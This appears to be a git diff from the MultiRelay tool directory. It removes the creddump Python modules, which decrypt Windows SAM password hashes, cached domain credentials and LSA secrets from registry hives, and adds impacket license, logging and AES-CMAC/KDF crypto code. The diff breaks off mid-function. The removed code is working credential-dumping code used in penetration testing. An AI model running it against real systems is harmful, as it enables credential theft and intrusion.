-    return (username, domain, domain_name, hash)
-
-def dump_hashes(Key, secaddr):
-    bootkey = Key
-    if not bootkey:
-        return []
-
-    lsakey = get_lsa_key(secaddr, bootkey)
-    if not lsakey:
-        return []
-
-    nlkm = get_nlkm(secaddr, lsakey)
-    if not nlkm:
-        return []
-
-    root = get_root(secaddr)
-    if not root:
-        return []
-
-    cache = open_key(root, ["Cache"])
-    if not cache:
-        return []
-
-    hashes = []
-    for v in values(cache):
-        if v.Name == "NL$Control": continue
-        
-        data = v.space.read(v.Data.value, v.DataLength.value)
-
-        (uname_len, domain_len, domain_name_len, 
-            enc_data, ch) = parse_cache_entry(data)
-        
-        # Skip if nothing in this cache entry
-        if uname_len == 0:
-            continue
-
-        dec_data = decrypt_hash(enc_data, nlkm, ch)
-
-        (username, domain, domain_name,
-            hash) = parse_decrypted_cache(dec_data, uname_len,
-                    domain_len, domain_name_len)
-
-        hashes.append((username, domain, domain_name, hash))
-
-    return hashes 
-
-def dump_file_hashes(Key, sechive_fname):
-    sysaddr = Key
-    secaddr = HiveFileAddressSpace(sechive_fname)
-
-    for (u, d, dn, hash) in dump_hashes(sysaddr, secaddr):
-        print "%s:%s:%s:%s" % (u.lower(), hash.encode('hex'),
-                               d.lower(), dn.lower())
-

tools/MultiRelay/creddump/framework/win32/hashdump.py

@@ -1,220 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-from framework.win32.rawreg import *
-from framework.addrspace import HiveFileAddressSpace
-try:
-    from Crypto.Hash import MD5
-    from Crypto.Cipher import ARC4,DES
-except ImportError:
-    pass
-from struct import unpack,pack
-
-odd_parity = [
-  1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
-  16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
-  32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
-  49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
-  64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
-  81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
-  97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
-  112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
-  128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
-  145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
-  161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
-  176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
-  193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
-  208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
-  224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
-  241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
-]
-
-# Permutation matrix for boot key
-p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
-      0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ]
-
-# Constants for SAM decrypt algorithm
-aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
-anum = "0123456789012345678901234567890123456789\0"
-antpassword = "NTPASSWORD\0"
-almpassword = "LMPASSWORD\0"
-
-empty_lm = "aad3b435b51404eeaad3b435b51404ee".decode('hex')
-empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0".decode('hex')
-
-def str_to_key(s):
-    key = []
-    key.append( ord(s[0])>>1 )
-    key.append( ((ord(s[0])&0x01)<<6) | (ord(s[1])>>2) )
-    key.append( ((ord(s[1])&0x03)<<5) | (ord(s[2])>>3) )
-    key.append( ((ord(s[2])&0x07)<<4) | (ord(s[3])>>4) )
-    key.append( ((ord(s[3])&0x0F)<<3) | (ord(s[4])>>5) )
-    key.append( ((ord(s[4])&0x1F)<<2) | (ord(s[5])>>6) )
-    key.append( ((ord(s[5])&0x3F)<<1) | (ord(s[6])>>7) )
-    key.append( ord(s[6])&0x7F )
-    for i in range(8):
-        key[i] = (key[i]<<1)
-        key[i] = odd_parity[key[i]]
-    return "".join(chr(k) for k in key)
-
-def sid_to_key(sid):
-    s1 = ""
-    s1 += chr(sid & 0xFF)
-    s1 += chr((sid>>8) & 0xFF)
-    s1 += chr((sid>>16) & 0xFF)
-    s1 += chr((sid>>24) & 0xFF)
-    s1 += s1[0];
-    s1 += s1[1];
-    s1 += s1[2];
-    s2 = s1[3] + s1[0] + s1[1] + s1[2]
-    s2 += s2[0] + s2[1] + s2[2]
-
-    return str_to_key(s1),str_to_key(s2)
-    
-def find_control_set(sysaddr):
-    root = get_root(sysaddr)
-    if not root:
-        return 1
-
-    csselect = open_key(root, ["Select"])
-    if not csselect:
-        return 1
-
-    for v in values(csselect):
-        if v.Name == "Current": return v.Data.value
-
-def get_hbootkey(samaddr, bootkey):
-    sam_account_path = ["SAM", "Domains", "Account"]
-
-    root = get_root(samaddr)
-    if not root: return None
-
-    sam_account_key = open_key(root, sam_account_path)
-    if not sam_account_key: return None
-
-    F = None
-    for v in values(sam_account_key):
-        if v.Name == 'F':
-            F = samaddr.read(v.Data.value, v.DataLength.value)
-    if not F: return None
-
-    md5 = MD5.new()
-    md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
-    rc4_key = md5.digest()
-
-    rc4 = ARC4.new(rc4_key)
-    hbootkey = rc4.encrypt(F[0x80:0xA0])
-    
-    return hbootkey
-
-def get_user_keys(samaddr):
-    user_key_path = ["SAM", "Domains", "Account", "Users"]
-
-    root = get_root(samaddr)
-    if not root: return []
-
-    user_key = open_key(root, user_key_path)
-    if not user_key: return []
-
-    return [k for k in subkeys(user_key) if k.Name != "Names"]
-
-def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
-    (des_k1,des_k2) = sid_to_key(rid)
-    d1 = DES.new(des_k1, DES.MODE_ECB)
-    d2 = DES.new(des_k2, DES.MODE_ECB)
-
-    md5 = MD5.new()
-    md5.update(hbootkey[:0x10] + pack("<L",rid) + lmntstr)
-    rc4_key = md5.digest()
-    rc4 = ARC4.new(rc4_key)
-    obfkey = rc4.encrypt(enc_hash)
-    hash = d1.decrypt(obfkey[:8]) + d2.decrypt(obfkey[8:])
-
-    return hash
-
-def decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey):
-    # LM Hash
-    if enc_lm_hash:
-        lmhash = decrypt_single_hash(rid, hbootkey, enc_lm_hash, almpassword)
-    else:
-        lmhash = ""
-    
-    # NT Hash
-    if enc_nt_hash:
-        nthash = decrypt_single_hash(rid, hbootkey, enc_nt_hash, antpassword)
-    else:
-        nthash = ""
-
-    return lmhash,nthash
-
-def get_user_hashes(user_key, hbootkey):
-    samaddr = user_key.space
-    rid = int(user_key.Name, 16)
-    V = None
-    for v in values(user_key):
-        if v.Name == 'V':
-            V = samaddr.read(v.Data.value, v.DataLength.value)
-    if not V: return None
-
-    hash_offset = unpack("<L", V[0x9c:0x9c+4])[0] + 0xCC
-
-    lm_exists = True if unpack("<L", V[0x9c+4:0x9c+8])[0] == 20 else False
-    nt_exists = True if unpack("<L", V[0x9c+16:0x9c+20])[0] == 20 else False
-
-    enc_lm_hash = V[hash_offset+4:hash_offset+20] if lm_exists else ""
-    enc_nt_hash = V[hash_offset+(24 if lm_exists else 8):hash_offset+(24 if lm_exists else 8)+16] if nt_exists else ""
-
-    return decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey)
-
-def get_user_name(user_key):
-    samaddr = user_key.space
-    V = None
-    for v in values(user_key):
-        if v.Name == 'V':
-            V = samaddr.read(v.Data.value, v.DataLength.value)
-    if not V: return None
-
-    name_offset = unpack("<L", V[0x0c:0x10])[0] + 0xCC
-    name_length = unpack("<L", V[0x10:0x14])[0]
-
-    username = V[name_offset:name_offset+name_length].decode('utf-16-le')
-    return username
-
-def dump_hashes(Key, samaddr):
-    bootkey = Key
-    hbootkey = get_hbootkey(samaddr,bootkey)
-    Output = ""
-    for user in get_user_keys(samaddr):
-        lmhash,nthash = get_user_hashes(user,hbootkey)
-        if not lmhash: lmhash = empty_lm
-        if not nthash: nthash = empty_nt
-        hashes = "%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name,16),
-                            lmhash.encode('hex'), nthash.encode('hex'))
-        hashesdump = "%s:%d:%s:%s:::\n" % (get_user_name(user), int(user.Name,16),
-                            lmhash.encode('hex'), nthash.encode('hex'))
-        print hashes
-        Output += hashesdump
-    return Output
-
-def dump_file_hashes(Key, samhive_fname):
-    samaddr = HiveFileAddressSpace(samhive_fname)
-    Output = dump_hashes(Key, samaddr)
-    return Output

tools/MultiRelay/creddump/framework/win32/lsasecrets.py

@@ -1,137 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-from framework.win32.rawreg import *
-from framework.addrspace import HiveFileAddressSpace
-#from framework.win32.hashdump import get_bootkey,str_to_key
-from Crypto.Hash import MD5
-from Crypto.Cipher import ARC4,DES
-
-def get_lsa_key(secaddr, bootkey):
-    root = get_root(secaddr)
-    if not root:
-        return None
-
-    enc_reg_key = open_key(root, ["Policy", "PolSecretEncryptionKey"])
-    if not enc_reg_key:
-        exit(1)
-        return None
-
-    enc_reg_value = enc_reg_key.ValueList.List[0]
-    if not enc_reg_value:
-        return None
-
-    obf_lsa_key = secaddr.read(enc_reg_value.Data.value,
-            enc_reg_value.DataLength.value)
-    if not obf_lsa_key:
-        return None
-
-    md5 = MD5.new()
-    md5.update(bootkey)
-    for i in range(1000):
-        md5.update(obf_lsa_key[60:76])
-    rc4key = md5.digest()
-
-    rc4 = ARC4.new(rc4key)
-    lsa_key = rc4.decrypt(obf_lsa_key[12:60])
-
-    return lsa_key[0x10:0x20]
-
-def decrypt_secret(secret, key):
-    """Python implementation of SystemFunction005.
-
-    Decrypts a block of data with DES using given key.
-    Note that key can be longer than 7 bytes."""
-    decrypted_data = ''
-    j = 0   # key index
-    for i in range(0,len(secret),8):
-        enc_block = secret[i:i+8]
-        block_key = key[j:j+7]
-        des_key = str_to_key(block_key)
-
-        des = DES.new(des_key, DES.MODE_ECB)
-        decrypted_data += des.decrypt(enc_block)
-        
-        j += 7
-        if len(key[j:j+7]) < 7:
-            j = len(key[j:j+7])
-
-    (dec_data_len,) = unpack("<L", decrypted_data[:4])
-    return decrypted_data[8:8+dec_data_len]
-
-def get_secret_by_name(secaddr, name, lsakey):
-    root = get_root(secaddr)
-    if not root:
-        return None
-    
-    enc_secret_key = open_key(root, ["Policy", "Secrets", name, "CurrVal"])
-    if not enc_secret_key:
-        return None
-
-    enc_secret_value = enc_secret_key.ValueList.List[0]
-    if not enc_secret_value:
-        return None
-
-    enc_secret = secaddr.read(enc_secret_value.Data.value,
-            enc_secret_value.DataLength.value)
-    if not enc_secret:
-        return None
-
-    return decrypt_secret(enc_secret[0xC:], lsakey)
-
-def get_secrets(Key, secaddr):
-    root = get_root(secaddr)
-    if not root:
-        return None
-
-    bootkey = Key
-    lsakey = get_lsa_key(secaddr, bootkey)
-
-    secrets_key = open_key(root, ["Policy", "Secrets"])
-    if not secrets_key:
-        print "no secret"
-        return None
-    
-    secrets = {}
-    for key in subkeys(secrets_key):
-        sec_val_key = open_key(key, ["CurrVal"])
-        if not sec_val_key:
-            continue
-        
-        enc_secret_value = sec_val_key.ValueList.List[0]
-        if not enc_secret_value:
-            continue
-        
-        enc_secret = secaddr.read(enc_secret_value.Data.value,
-                enc_secret_value.DataLength.value)
-        if not enc_secret:
-            continue
-
-        secret = decrypt_secret(enc_secret[0xC:], lsakey)
-        secrets[key.Name] = secret
-
-    return secrets
-
-def get_file_secrets(Key, secfile):
-    secaddr = HiveFileAddressSpace(secfile)
-
-    return get_secrets(Key, secaddr)
-

tools/MultiRelay/creddump/framework/win32/rawreg.py

@@ -1,73 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-from framework.newobj import Obj,Pointer
-from struct import unpack
-
-ROOT_INDEX = 0x20
-LH_SIG = unpack("<H","lh")[0]
-LF_SIG = unpack("<H","lf")[0]
-RI_SIG = unpack("<H","ri")[0]
-
-def get_root(address_space):
-    return Obj("_CM_KEY_NODE", ROOT_INDEX, address_space)
-
-def open_key(root, key):
-    if key == []:
-        return root
-    
-    keyname = key.pop(0)
-    for s in subkeys(root):
-        if s.Name.upper() == keyname.upper():
-            return open_key(s, key)
-    print "ERR: Couldn't find subkey %s of %s" % (keyname, root.Name)
-    return None
-
-def subkeys(key,stable=True):
-    if stable: k = 0
-    else: k = 1
-    sk = (key.SubKeyLists[k]/["pointer", ["_CM_KEY_INDEX"]]).value
-    sub_list = []
-    if (sk.Signature.value == LH_SIG or
-            sk.Signature.value == LF_SIG):
-        sub_list = sk.List
-    elif sk.Signature.value == RI_SIG:
-        lfs = []
-        for i in range(sk.Count.value):
-            off,tp = sk.get_offset(['List', i])
-            lfs.append(Pointer("pointer", sk.address+off, sk.space,
-                ["_CM_KEY_INDEX"]))
-        for lf in lfs:
-            sub_list += lf.List
-
-    for s in sub_list:
-        if s.is_valid() and s.Signature.value == 27502:
-            yield s.value
-
-def values(key):
-    for v in key.ValueList.List:
-        yield v.value
-
-def walk(root):
-    for k in subkeys(root):
-        yield k
-        for j in walk(k):
-            yield j

tools/MultiRelay/creddump/lsadump.py

@@ -1,54 +0,0 @@
-#!/usr/bin/env python
-
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-import sys
-from framework.win32.lsasecrets import get_file_secrets
-
-# Hex dump code from
-# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
-
-FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
-
-def dump(src, length=8):
-    N=0; result=''
-    while src:
-       s,src = src[:length],src[length:]
-       hexa = ' '.join(["%02X"%ord(x) for x in s])
-       s = s.translate(FILTER)
-       result += "%04X   %-*s   %s\n" % (N, length*3, hexa, s)
-       N+=length
-    return result
-
-if len(sys.argv) < 3:
-    print "usage: %s Bootkey <security hive>" % sys.argv[0]
-    sys.exit(1)
-
-secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2])
-if not secrets:
-    print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
-    sys.exit(1)
-
-for k in secrets:
-    print k
-    print dump(secrets[k], length=16)
-

tools/MultiRelay/creddump/pwdump.py

@@ -1,31 +0,0 @@
-#!/usr/bin/env python
-
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-import sys
-from framework.win32.hashdump import dump_file_hashes
-
-if len(sys.argv) < 3:
-    print "usage: %s bootkey SAM_File" % sys.argv[0]
-    sys.exit(1)
-
-dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])

tools/MultiRelay/impacket-dev/LICENSE

@@ -0,0 +1,84 @@
+Licencing
+---------
+
+We provide this software under a slightly modified version of the
+Apache Software License. The only changes to the document were the
+replacement of "Apache" with "Impacket" and "Apache Software Foundation"
+with "SecureAuth Corporation". Feel free to compare the resulting
+document to the official Apache license.
+
+The `Apache Software License' is an Open Source Initiative Approved
+License.
+
+
+The Apache Software License, Version 1.1
+Modifications by SecureAuth Corporation (see above)
+
+Copyright (c) 2000 The Apache Software Foundation.  All rights
+reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+1. Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in
+   the documentation and/or other materials provided with the
+   distribution.
+
+3. The end-user documentation included with the redistribution,
+   if any, must include the following acknowledgment:
+      "This product includes software developed by
+       SecureAuth Corporation (https://www.secureauth.com/)."
+   Alternately, this acknowledgment may appear in the software itself,
+   if and wherever such third-party acknowledgments normally appear.
+
+4. The names "Impacket", "SecureAuth Corporation" must
+   not be used to endorse or promote products derived from this
+   software without prior written permission. For written
+   permission, please contact oss@secureauth.com.
+
+5. Products derived from this software may not be called "Impacket",
+   nor may "Impacket" appear in their name, without prior written
+   permission of SecureAuth Corporation.
+
+THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+
+
+Smb.py and nmb.py are based on Pysmb by Michael Teo
+(https://miketeo.net/projects/pysmb/), and are distributed under the
+following license:
+
+This software is provided 'as-is', without any express or implied
+warranty.  In no event will the author be held liable for any damages
+arising from the use of this software.
+
+Permission is granted to anyone to use this software for any purpose,
+including commercial applications, and to alter it and redistribute it
+freely, subject to the following restrictions:
+
+1. The origin of this software must not be misrepresented; you must
+   not claim that you wrote the original software. If you use this
+   software in a product, an acknowledgment in the product
+   documentation would be appreciated but is not required.
+
+2. Altered source versions must be plainly marked as such, and must
+   not be misrepresented as being the original software.
+
+3. This notice cannot be removed or altered from any source
+   distribution.

tools/MultiRelay/impacket-dev/impacket/__init__.py

@@ -0,0 +1,25 @@
+# Copyright (c) 2003-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+
+# Set default logging handler to avoid "No handler found" warnings.
+import logging
+try:  # Python 2.7+
+    from logging import NullHandler
+except ImportError:
+    class NullHandler(logging.Handler):
+        def emit(self, record):
+            pass
+
+# All modules inside this library MUST use this logger (impacket)
+# It is up to the library consumer to do whatever is wanted 
+# with the logger output. By default it is forwarded to the 
+# upstream logger
+
+LOG = logging.getLogger(__name__)
+LOG.addHandler(NullHandler())

tools/MultiRelay/impacket-dev/impacket/crypto.py

@@ -0,0 +1,346 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (beto@coresecurity.com)
+#
+# Description:
+#   RFC 4493 implementation (https://www.ietf.org/rfc/rfc4493.txt)
+#   RFC 4615 implementation (https://www.ietf.org/rfc/rfc4615.txt)
+#
+#   NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation
+#   (https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108)
+#
+#   [MS-LSAD] Section 5.1.2
+#   [MS-SAMR] Section 2.2.11.1.1
+
+from __future__ import division
+from __future__ import print_function
+from impacket import LOG
+try:
+    from Cryptodome.Cipher import DES, AES
+except Exception:
+    LOG.error("Warning: You don't have any crypto installed. You need pycryptodomex")
+    LOG.error("See https://pypi.org/project/pycryptodomex/")
+from struct import pack, unpack
+from impacket.structure import Structure
+import hmac, hashlib
+from six import b
+
+def Generate_Subkey(K):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                    Algorithm Generate_Subkey                      +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K (128-bit key)                                      +
+#   +   Output   : K1 (128-bit first subkey)                            +
+#   +              K2 (128-bit second subkey)                           +
+#   +-------------------------------------------------------------------+
+#   +                                                                   +
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Rb   is 0x00000000000000000000000000000087     +
+#   +   Variables: L          for output of AES-128 applied to 0^128    +
+#   +                                                                   +
+#   +   Step 1.  L := AES-128(K, const_Zero);                           +
+#   +   Step 2.  if MSB(L) is equal to 0                                +
+#   +            then    K1 := L << 1;                                  +
+#   +            else    K1 := (L << 1) XOR const_Rb;                   +
+#   +   Step 3.  if MSB(K1) is equal to 0                               +
+#   +            then    K2 := K1 << 1;                                 +
+#   +            else    K2 := (K1 << 1) XOR const_Rb;                  +
+#   +   Step 4.  return K1, K2;                                         +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    AES_128 = AES.new(K, AES.MODE_ECB)
+
+    L = AES_128.encrypt(bytes(bytearray(16)))
+
+    LHigh = unpack('>Q',L[:8])[0]
+    LLow  = unpack('>Q',L[8:])[0]
+
+    K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF
+    K1Low  = (LLow << 1) & 0xFFFFFFFFFFFFFFFF
+
+    if (LHigh >> 63):
+        K1Low ^= 0x87
+
+    K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF
+    K2Low  = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF
+
+    if (K1High >> 63):
+        K2Low ^= 0x87
+
+    K1 = bytearray(pack('>QQ', K1High, K1Low))
+    K2 = bytearray(pack('>QQ', K2High, K2Low))
+
+    return K1, K2
+
+def XOR_128(N1,N2):
+
+    J = bytearray()
+    for i in range(len(N1)):
+        #J.append(indexbytes(N1,i) ^ indexbytes(N2,i))
+        J.append(N1[i] ^ N2[i])
+    return J
+
+def PAD(N):
+    padLen = 16-len(N)
+    return  N + b'\x80' + b'\x00'*(padLen-1)
+
+def AES_CMAC(K, M, length):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                   Algorithm AES-CMAC                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K    ( 128-bit key )                                 +
+#   +            : M    ( message to be authenticated )                 +
+#   +            : len  ( length of the message in octets )             +
+#   +   Output   : T    ( message authentication code )                 +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Bsize is 16                                    +
+#   +                                                                   +
+#   +   Variables: K1, K2 for 128-bit subkeys                           +
+#   +              M_i is the i-th block (i=1..ceil(len/const_Bsize))   +
+#   +              M_last is the last block xor-ed with K1 or K2        +
+#   +              n      for number of blocks to be processed          +
+#   +              r      for number of octets of last block            +
+#   +              flag   for denoting if last block is complete or not +
+#   +                                                                   +
+#   +   Step 1.  (K1,K2) := Generate_Subkey(K);                         +
+#   +   Step 2.  n := ceil(len/const_Bsize);                            +
+#   +   Step 3.  if n = 0                                               +
+#   +            then                                                   +
+#   +                 n := 1;                                           +
+#   +                 flag := false;                                    +
+#   +            else                                                   +
+#   +                 if len mod const_Bsize is 0                       +
+#   +                 then flag := true;                                +
+#   +                 else flag := false;                               +
+#   +                                                                   +
+#   +   Step 4.  if flag is true                                        +
+#   +            then M_last := M_n XOR K1;                             +
+#   +            else M_last := padding(M_n) XOR K2;                    +
+#   +   Step 5.  X := const_Zero;                                       +
+#   +   Step 6.  for i := 1 to n-1 do                                   +
+#   +                begin                                              +
+#   +                  Y := X XOR M_i;                                  +
+#   +                  X := AES-128(K,Y);                               +
+#   +                end                                                +
+#   +            Y := M_last XOR X;                                     +
+#   +            T := AES-128(K,Y);                                     +
+#   +   Step 7.  return T;                                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    const_Bsize = 16
+    const_Zero  = bytearray(16)
+
+    AES_128= AES.new(K, AES.MODE_ECB)
+    M      = bytearray(M[:length])
+    K1, K2 = Generate_Subkey(K)
+    n      = len(M)//const_Bsize
+
+    if n == 0:
+        n = 1
+        flag = False
+    else:
+        if (length % const_Bsize) == 0:
+            flag = True
+        else:
+            n += 1
+            flag = False
+
+    M_n = M[(n-1)*const_Bsize:]
+    if flag is True:
+        M_last = XOR_128(M_n,K1)
+    else:
+        M_last = XOR_128(PAD(M_n),K2)
+
+    X = const_Zero
+    for i in range(n-1):
+        M_i = M[(i)*const_Bsize:][:16]
+        Y   = XOR_128(X, M_i)
+        X   = bytearray(AES_128.encrypt(bytes(Y)))
+    Y = XOR_128(M_last, X)
+    T = AES_128.encrypt(bytes(Y))
+
+    return T
+
+def AES_CMAC_PRF_128(VK, M, VKlen, Mlen):
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                        AES-CMAC-PRF-128                           +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   + Input  : VK (Variable-length key)                                 +
+#   +        : M (Message, i.e., the input data of the PRF)             +
+#   +        : VKlen (length of VK in octets)                           +
+#   +        : len (length of M in octets)                              +
+#   + Output : PRV (128-bit Pseudo-Random Variable)                     +
+#   +                                                                   +
+#   +-------------------------------------------------------------------+
+#   + Variable: K (128-bit key for AES-CMAC)                            +
+#   +                                                                   +
+#   + Step 1.   If VKlen is equal to 16                                 +
+#   + Step 1a.  then                                                    +
+#   +               K := VK;                                            +
+#   + Step 1b.  else                                                    +
+#   +               K := AES-CMAC(0^128, VK, VKlen);                    +
+#   + Step 2.   PRV := AES-CMAC(K, M, len);                             +
+#   +           return PRV;                                             +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+    if VKlen == 16:
+        K = VK
+    else:
+        K = AES_CMAC(bytes(bytearray(16)), VK, VKlen)
+
+    PRV = AES_CMAC(K, M, Mlen)
+
+    return PRV
+
+def KDF_CounterMode(KI, Label, Context, L):
+# Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256
+# https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108
+# Fixed values:
+#  1. h - The length of the output of the PRF in bits, and
+#  2. r - The length of the binary representation of the counter i.
+# Input: KI, Label, Context, and L.
+# Process:
+#  1. n := [L/h]
+#  2. If n > 2r-1, then indicate an error and stop.
+#  3. result(0):= empty .
+#  4. For i = 1 to n, do
+#    a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2)
+#    b. result(i) := result(i-1) || K(i).
+#  5. Return: KO := the leftmost L bits of result(n).
+    h = 256
+    r = 32
+
+    n = L // h
+
+    if n == 0:
